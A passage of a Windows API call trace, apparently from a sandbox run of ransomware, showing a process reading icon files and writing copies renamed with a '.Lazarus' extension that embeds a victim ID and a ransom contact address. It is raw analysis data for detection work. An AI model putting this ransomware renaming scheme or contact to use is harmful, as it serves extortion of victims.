RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0076.184] GetLastError () returned 0x0 [0076.184] SetLastError (dwErrCode=0x0) [0076.184] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0076.184] WriteFile (in: hFile=0x42c, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327ef70*=0x7a0, lpOverlapped=0x0) returned 1 [0076.185] GetLastError () returned 0x0 [0076.185] SetLastError (dwErrCode=0x0) [0076.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0076.185] GetLastError () returned 0x0 [0076.185] SetLastError (dwErrCode=0x0) [0076.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0076.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0076.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0076.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0076.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0076.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92460 | out: hHeap=0x20000) returned 1 [0076.185] CloseHandle (hObject=0x42c) returned 1 [0076.187] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0076.187] CloseHandle (hObject=0x410) returned 1 [0076.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0076.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0076.188] AreFileApisANSI () returned 1 [0076.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0076.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0076.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x6d4d0, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 40 [0076.188] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0076.189] GetFileType (hFile=0x410) returned 0x1 [0076.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0076.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0076.189] GetLastError () returned 0xb7 [0076.189] SetLastError (dwErrCode=0xb7) [0076.189] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0076.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0076.190] CloseHandle (hObject=0x410) returned 1 [0076.190] AreFileApisANSI () returned 1 [0076.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0076.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0076.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 40 [0076.190] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico")) returned 1 [0076.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0076.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0076.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0076.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0076.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d750 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x94680 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0076.192] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.192] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.192] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x1, dwReserved1=0x0, cFileName="SysReqMet.ico", cAlternateFileName="SYSREQ~1.ICO")) returned 1 [0076.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0076.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0076.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0076.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0076.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0076.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0076.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0076.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0076.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0076.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0076.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0076.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0076.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0076.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0076.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0076.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0076.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0076.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0076.193] AreFileApisANSI () returned 1 [0076.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico", lpUsedDefaultChar=0x0) returned 45 [0076.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0076.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0076.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0076.193] AreFileApisANSI () returned 1 [0076.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0076.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71bd0 [0076.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 45 [0076.193] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0076.194] GetFileType (hFile=0x410) returned 0x1 [0076.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0076.194] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0076.194] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0076.194] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0076.194] CloseHandle (hObject=0x410) returned 1 [0076.194] AreFileApisANSI () returned 1 [0076.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0076.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0076.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 45 [0076.194] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0076.195] GetFileType (hFile=0x410) returned 0x1 [0076.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0076.195] CloseHandle (hObject=0x410) returned 1 [0076.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0076.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0076.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0076.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0076.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0076.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0076.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0076.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0076.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0076.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0076.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0076.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0076.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0076.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0076.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0076.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0076.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0076.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0076.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0076.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0076.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0076.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0076.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0076.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0076.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0076.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0076.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0076.196] AreFileApisANSI () returned 1 [0076.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0076.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0076.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 45 [0076.196] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e)) returned 1 [0076.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0076.196] AreFileApisANSI () returned 1 [0076.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0076.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0076.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0076.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0076.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0076.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0076.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0076.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0076.196] GetLastError () returned 0x0 [0076.196] SetLastError (dwErrCode=0x0) [0076.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dea8 [0076.354] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x94680 [0076.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bae0 [0076.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0076.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0076.358] GetLastError () returned 0x0 [0076.358] SetLastError (dwErrCode=0x0) [0076.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0076.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0076.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71b00 [0076.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0076.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8b078 [0076.358] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0076.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0076.358] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0076.359] AreFileApisANSI () returned 1 [0076.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8b078, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0076.359] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0076.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8b078, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0076.360] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0076.363] GetFileType (hFile=0x410) returned 0x1 [0076.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0076.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0076.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0076.364] AreFileApisANSI () returned 1 [0076.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0076.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0076.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 45 [0076.365] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.367] GetFileType (hFile=0x42c) returned 0x1 [0076.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0076.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0076.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0076.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0076.367] GetLastError () returned 0x0 [0076.367] SetLastError (dwErrCode=0x0) [0076.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0076.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0076.368] GetLastError () returned 0x0 [0076.368] SetLastError (dwErrCode=0x0) [0076.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0076.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0076.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0076.369] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x47e, lpOverlapped=0x0) returned 1 [0076.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0076.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0076.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x92460 [0076.379] GetLastError () returned 0x0 [0076.379] SetLastError (dwErrCode=0x0) [0076.400] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0076.400] GetLastError () returned 0x0 [0076.400] SetLastError (dwErrCode=0x0) [0076.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d618 [0076.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0076.400] GetLastError () 